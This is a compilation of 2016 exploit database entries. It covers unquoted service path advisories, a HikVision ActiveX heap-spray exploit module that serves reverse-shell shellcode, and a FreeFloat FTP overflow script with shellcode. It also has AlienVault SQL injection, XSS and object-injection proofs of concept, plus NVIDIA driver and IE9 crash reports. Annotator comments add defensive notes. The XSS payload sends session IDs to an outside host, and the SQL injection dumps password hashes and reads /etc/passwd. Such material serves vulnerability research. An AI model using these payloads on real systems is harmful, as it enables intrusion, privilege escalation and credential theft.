#########################################################################
# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
# Date: 19/10/2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
# version : 10.0.2 (Latest)
# Tested on: Windows 7
##########################################################################
IObit Advanced SystemCare installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert
an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AdvancedSystemCareService10
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService10
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : Advanced SystemCare Service 10
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
################################################
######### Ashiyane Digital Security Team ############
########## exploit by: Amir.ght #####################
################################################
#!/usr/bin/env python
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
# visit eastfw.com eastexploits.com for more info
import sys
import re
import os
import socket
import random
import string
from struct import pack
sys.path.append("./core")
from Sploit import Sploit
sys.path.append("./shellcodes")
from Shellcodes import OSShellcodes
# Module metadata read by the EAST framework loader: name, description,
# vendor link, free-form notes, changelog and the module path.
INFO = {
    'NAME': "efa_HikVision_Security_Systems_activex",
    'DESCRIPTION': "HikVision Security Systems activex Remote Overflow",
    'VENDOR': "http://www.hikvision.com/us/Tools_84.html",
    "CVE Name": "0-day",
    "NOTES": """
Exploit-db.com information:
# Exploit Title: HikVision Security Systems ActiveX exploit designed for EAST framework
# Google Dork: none
# Date: 19 October 2016
# Exploit Author: EAST framework development team. Yuriy Gurkin
# Vendor Homepage: http://www.hikvision.com/us
# Software Link: http://www.hikvision.com/us/Tools_84.html client software
# Version: v2.5.0.5
# Tested on: Windows XP, 7
# CVE : 0day
General information:
Loaded File: C:\temp\WEBCAM~1\HIKVIS~1\NETVID~1.OCX
Name: NETVIDEOACTIVEX23Lib
Lib GUID: {99F388E9-F788-41D5-A103-8F4961539F88}
Version: 1.0
Lib Classes: 1
Class NetVideoActiveX23
GUID: {CAFCF48D-8E34-4490-8154-026191D73924}
Number of Interfaces: 1
Default Interface: _DNetVideoActiveX23
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
""",
    'CHANGELOG': "13 Jan, 2016. Written by Gleg team.",
    'PATH': "Exploits/",
}

# Framework-facing module properties.
PROPERTY = {
    'DESCRIPTION': "ActiveX 0-day",
    'MODULE_TYPE': "Scada",
}

# Must be in every module, to be set by framework
OPTIONS = {
    "CONNECTBACK_PORT": "8089",
}
class exploit(Sploit):
    """EAST module that serves a browser page targeting the HikVision ActiveX control.

    run() opens a bare TCP listener and answers every connection with one
    fixed HTTP response whose body (built by make_data) embeds the shellcode
    from create_shellcode in a heap spray and then calls the control's
    GetServerIP method with an oversized string argument.

    Defensive view: the indicators visible on the wire are the <object> tag
    with CLSID CAFCF48D-8E34-4490-8154-026191D73924, the large unescape()-
    based spray, the 555 x 2-character GetServerIP argument and a
    'Server: Apache' header on a non-Apache listener. The INFO notes above
    record the control as safe-for-scripting with no kill bit set; setting
    the kill bit for that CLSID stops the browser loading it at all.
    """
    def __init__(self,
                 port=8089,
                 logger=None):
        # port: default connect-back port, possibly overridden by args()
        # from OPTIONS. logger is passed straight to the Sploit base class.
        Sploit.__init__(self,logger=logger)
        self.port = port
        self.state = "running"
        return

    def args(self):
        # Pull the framework-supplied options. NOTE(review): this assignment
        # replaces the bound method `args` with the returned dict on the
        # instance, so a second self.args() call would fail (a dict is not
        # callable); run() calls it exactly once and the other methods then
        # index self.args as a dict.
        self.args = Sploit.args(self, OPTIONS)
        self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
        return

    def create_shellcode(self):
        # The connect-back address is this host's own resolved hostname.
        # With a framework listener a 'reverse' payload is built on the
        # listener's port; otherwise a 'command' payload with port 9999
        # (what each type does is defined in Shellcodes, not here).
        self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())
        if self.args['listener']:
            shellcode_type = 'reverse'
            port = int(self.args['listener']['PORT'])
        else:
            port = 9999
            shellcode_type = 'command'
        self.CONNECTBACK_PORT = port
        os_system = os_target = 'WINDOWS'  # os_system is never read
        os_arch = '32bit'
        s = OSShellcodes(os_target,
                         os_arch,
                         self.CONNECTBACK_IP,
                         self.CONNECTBACK_PORT)
        s.TIMESTAMP = 'codesys'
        shellcode = s.create_shellcode(
            shellcode_type,
            encode=0,
            debug=1
        )
        return shellcode

    def make_data(self, shellcode):
        # HTML template: the <object> instantiates the control by CLSID; the
        # script builds 3500 strings of NOP padding plus shellcode, then
        # passes a 555 x 2-character string to GetServerIP. The template is
        # a runtime string, so no comments are placed inside it.
        filedata="""
<html>
<object classid='clsid:CAFCF48D-8E34-4490-8154-026191D73924' id='target' ></object>
<script type='text/javascript' language="javascript">
ar=new Array();
function spray(buffer) {
var hope = unescape('%u9090%u9090');
var unbuffer = unescape(buffer);
var v = 20 + unbuffer.length;
while(hope.length<v)
hope += hope;
var fk = hope.substring(0, v);
var bk = hope.substring(0, hope.length- v );
delete v;
delete hope;
while(bk.length+v<0x40000) {
bk=bk+bk+fk;
}
for(i=0;i<3500;i++) {
ar[i] = bk + unbuffer;
}
}
spray(<SHELLCODE>);
buffer = "";
for (i = 0; i < 555; i++) buffer += unescape('%u9090%u9090');
target.GetServerIP (buffer);
</script>
</html>
"""
        # JavaScript unescape() consumes %uXXXX 16-bit units, so the
        # shellcode is padded to an even length with a 0x90 NOP and each
        # byte pair is emitted with byte i+1 in the high half and byte i in
        # the low half, i.e. as a little-endian 16-bit word that preserves
        # the original byte order in memory.
        if len(shellcode)%2:
            shellcode="\x90"+shellcode
        shell="unescape(\""
        i = 0
        while i < len(shellcode):
            shell += "%u"+"%02X%02X" %(ord(shellcode[i+1]),ord(shellcode[i]))
            i += 2
        shell += "\")"
        filedata = filedata.replace("<SHELLCODE>", shell)
        return filedata

    def run(self):
        # Framework entry point: build the payload once, then serve it to
        # every client that connects. Returns 0 on shellcode failure; the
        # success return below is unreachable (see the loop comment).
        self.args()
        self.log("Generating shellcode")
        shellcode = self.create_shellcode()
        if not shellcode:
            self.log("Something goes wrong")
            return 0
        self.log("Generate Evil HTML")
        html = self.make_data(shellcode)
        self.log("Done")
        self.log("Starting web server")
        ip_server = "0.0.0.0"
        crlf = "\r\n"
        # Hand-rolled, fixed HTTP/1.1 response; the Server header is forged.
        response = "HTTP/1.1 200 OK" + crlf
        response += "Content-Type: text/html" + crlf
        response += "Connection: close" + crlf
        response += "Server: Apache" + crlf
        response += "Content-Length: " + str(len(html))
        response += crlf + crlf + html + crlf
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # NOTE(review): the listening port is hard-coded to 8089 here, so
        # self.port / CONNECTBACK_PORT from args() never affects where the
        # page is served.
        server = (ip_server, 8089)
        s.bind(server)
        s.listen(1)
        # The request is read but never inspected: any client gets the same
        # response. The bare except swallows every error (KeyboardInterrupt
        # included) and the loop has no break or return, so the three
        # statements after it are unreachable.
        while True:
            try:
                connection, client_address = s.accept()
                data = connection.recv(2048)
                self.log("Got request, sending payload")
                connection.send(response)
                self.log("exploit send")
                connection.close()
            except:
                print("EXCEPT")
        self.log('All done')
        self.finish(True)
        return 1
if __name__ == '__main__':
    """
By now we only have the tool
mode for exploit..
Later we would have
standalone mode also.
"""
    # Python 2 print statement. NOTE(review): exploit.__init__ takes
    # (port, logger), so these positional arguments bind
    # port="192.168.0.1" and logger=80 -- the values look like an
    # address/port pair meant for a different signature, and run() binds
    # to a hard-coded port anyway.
    print "Running exploit %s .. " % INFO['NAME']
    e = exploit("192.168.0.1",80)
    e.run()
# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 8.0.1.1399
# Tested on: Windows 7 Professional
The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 8.0.1.1399, but other versions may be affected
as well.
---------------------------------------------------------------------------
C:\>sc qc LMS
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LMS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) Management and Security Application Local Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Lenovo RapidBoot HDD Accelerator - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.00.0802
# Tested on: Windows 7 Professional
The Lenovo RapidBoot HDD Accelerator service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.00.0802, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc FastbootService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FastbootService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FastbootService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Lenovo Slim USB Keyboard - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.09
# Tested on: Windows 7 Professional
The Lenovo Slim USB Keyboard service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.09, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc Sks8821
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Sks8821
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Skdaemon Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Vembu StoreGrid - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 4.0
# Tested on: Windows Server 2012
StoreGrid is a re-brandable backup solution, which can install 2 services with unquoted service paths.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 4.0, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RemoteBackup
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\bin\StoreGrid.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc RemoteBackup_webServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup_webServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\apache\Apache.exe -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup_WebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 15.1.0.0096
# Tested on: Windows 7 Professional
The Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 15.1.0.0096, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc AMPPALR3
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AMPPALR3
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intelr Centrinor Wireless Bluetoothr + High Speed Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880
The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation of the input/output buffers or their sizes.
In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0.
This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver.
A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip
<!--
Source: http://blog.skylined.nl/20161101001.html
Synopsis
A specially crafted webpage can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<!doctype html>
<script>
// Repro for the IE9 CAttrArray use-after-free described in the comments
// around this block: the Analysis section says the textarea's initial
// CImplAry buffer holds 4 attributes and is reallocated (and the original
// freed) once it is full. These property assignments are what fill it and
// trigger the grow; the code then keeps using the freed buffer.
// Mitigation noted above: disabling JavaScript prevents reaching this path.
oTextArea = document.createElement('textarea');
oTextArea.dataSrc = 1;
oTextArea.id = 1;
oTextArea.innerHTML = 1;
oTextArea.onvolumechange = 1;
oTextArea.style.setProperty('list-style', "url()");
</script>
<!--
Analysis
The CAttrArray object initially allocates a CImplAry buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer are copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.
Exploit
If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
Timeline
- April 2014: This vulnerability was found through fuzzing.
- July 2014: This vulnerability was submitted to ZDI.
- July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.)
- October 2014: Microsoft released MS14-056, which addresses this issue.
- November 2016: Details of this issue are released.
-->
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.
POC
===
This request will dump user password hashes to a file:
/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd').
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the
login process. It's possible to inject a script into that header that
then gets executed when mousing over the User-Agent field in Settings
-> Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case).
<script>$('#ops_table
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files
due to the unsafe use of the unserialize() function. The affected
files include flow_chart.php, gauge.php, honeypot.php,
image.php, inventory.php, otx.php, rss.php, security.php, siem.php,
taxonomy.php, tickets.php, and url.php.
An authenticated attacker could send a serialized PHP object to one of
the vulnerable pages and potentially gain code execution via magic
methods in included classes.
POC
====
This benign POC injects the IDS_Report class from PHPIDS into the
refresh parameter of image.php. The __toString method of IDS_Report is
then executed and the output is displayed in the value of the content
field in the response:
/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
import socket
import sys
import os
# Python 2 script (print statement, raw_input): interactive PoC for the
# FreeFloat FTP 1.0 overflow in the 'dir' command handler named in the
# banner. Defensive view: the wire indicator is an FTP 'dir' argument of
# several hundred bytes containing a 0x90 NOP run followed by machine code.
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
# Date: 2016.11.02
# Exploit Author: Greg Priest
# Version: FreefloatFTPserver1.0
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")  # not validated; passed straight to connect()
port = 21
# Buffer layout, going by the variable names: 247 filler bytes, then the
# 4 bytes named `eip` (a build-specific value intended to land on the saved
# return address), then a 10-byte NOP slide in front of the payload.
overflow = 'A' * 247
eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + eip + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` never holds anything useful.
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
# 'PASSW' is not the FTP PASS verb; presumably the server does not reject
# the session over it -- unverified here.
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
# NOTE(review): this is printed before the 'dir' line is sent, so it says
# nothing about whether the send or the overflow actually succeeded.
print '''
Successfull Exploitation!
'''
message = 'dir ' + remotecode
s.send(message)
s.recv(1024)
# NOTE(review): `s.close` without parentheses only references the bound
# method; the socket is never explicitly closed.
s.close
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=942
The DxgkDdiEscape handler for escape 0x100009a lacks proper bounds checks:
case 0x100009A:
...
size_0 = escape_data->size_1;
...
size_1 = 2 - (escape_data->unknown < 18);
...
size_2 = escape_data->size_2;
...
total_size = size_0 * size_1 * size_2;
...
if (total_size > 0x10)
do_debug_thingo();
if (total_size) {
DWORD* ptr = alloced_buf + 24;
DWORD* user_buf = escape_data->data;
...
while (total_size) {
*(ptr - 1) = *(user_buf - 1);
*ptr = *user_buf;
...
user_buf += 4;
ptr += 39;
--total_size;
}
There is a check that total_size > 0x10, which calls some kind of a
debug/logging function (do_debug_thingo in my pseudocode), but it does not
actually stop processing of the escape. This leads to buffer overflow on the
allocated pool buffer later on.
Note that there is also a potential integer overflow in the calculation of
|total_size|. Since the individual sizes (size_0, size_1, size_2) appear to be
stored in a struct and eventually passed off to another function, there may be
more problems later on too.
Crashing context with PoC (Win10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
...
rax=00000000caa6ed30 rbx=0000000000000000 rcx=ffffc001cd337044
rdx=00000000000f41bd rsi=0000000000000000 rdi=0000000000000000
rip=fffff80102461188 rsp=ffffd000243bbed0 rbp=ffffd000243bbfd0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
nvlddmkm!nvDumpConfig+0x12a2b0:
fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd337040=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40665.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=940
The DxgkDdiEscape handler for 0x70001b2 doesn't do proper bounds checks for its
variable size input.
void sub_8C4304(...) {
...
// escape_->size is controlled by the user.
if ( escape_->size < size )
size = escape_->size;
memcpy(escape_->data, v31, 28i64 * size);
...
}
Note that this appears to be a common pattern. Normally, before
escape handlers are executed, |PrivateDriverDataSize| (from DXGKARG_ESCAPE)
is checked to be equal to some value against a hardcoded table. However, some escapes
allow a more relaxed check that |PrivateDriverDataSize| >= minimum. This means that
the handlers themselves must implement an ad hoc bounds check, which either seems to be
missing or implemented incorrectly (relying on a user specified value) in many cases.
bug 936 is a similar issue and there are likely more. I've noticed (but not confirmed)
a few more OOB reads that I haven't reported that follow this same pattern.
Crashing context with PoC (Win 10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
...
rax=ffffd000239d51dc rbx=0000000000000000 rcx=fffffffffffffff4
rdx=fffff000e9e6c754 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80166d6aca0 rsp=ffffd000239d3df8 rbp=ffffd000239d3f00
r8=0000000000000924 r9=000000000000003b r10=000000000000e9ef
r11=ffffd000239d48ac r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe cy
nvlddmkm+0x5daca0:
fffff801`66d6aca0 f30f7f40f0 movdqu xmmword ptr [rax-10h],xmm0 ds:ffffd000`239d51cc=????????????????????????????????
Resetting default scope
To reproduce, compile as an x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40664.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=937
The DxgkDdiEscape handler for 0x5000027 accepts a user provided pointer,
but does no checks on it before using it.
...
DWORD* user_ptr = escape_5000027_data->user_ptr;
v32 = user_ptr[2];
v33 = user_ptr + 3;
if ( v32 != -1 )
v33 = (_DWORD *)v32;
sub_91C24(miniport_context_, *user_ptr, user_ptr[1], v33, (__int64)&escape_data_);
...
The PoC I’ve provided causes a read on said pointer, but based on inspecting where this pointer
is passed it seems like there is at least 1 code path that can result in a write (I haven't
confirmed this though).
(On Win 10 x64 with 372.54)
FAULTING_IP:
nvlddmkm!nvDumpConfig+1338c7
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8]
CONTEXT: ffffd00023649970 -- (.cxr 0xffffd00023649970)
rax=4141414141414141 rbx=ffffd0002364a870 rcx=0000000005000017
rdx=ffffd0002364a498 rsi=0000000000000000 rdi=ffffd0002364a498
rip=fffff8018a26a79f rsp=ffffd0002364a390 rbp=ffffd0002364a4a9
r8=ffffd0002364a870 r9=ffffe8023c537220 r10=0000000000000000
r11=ffffd0002364a370 r12=ffffe8023c537220 r13=fffff80189fa9370
r14=ffffe000d6f2a000 r15=ffffe8023c537220
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
nvlddmkm!nvDumpConfig+0x1338c7:
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] ds:002b:41414141`41414149=????????
Resetting default scope
To reproduce, compile the PoC as an x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40663.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936
The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size
input escape data, and relies on a user provided size as the upper bound for writing output.
Crashing context with PoC (Win 10 x64 with 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
...
rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8
r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620
r11=0000000000000450 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe nc
dxgkrnl!_report_gsfailure+0x5:
fffff801`f4152b75 cd29 int 29h
Resetting default scope
EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228)
ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
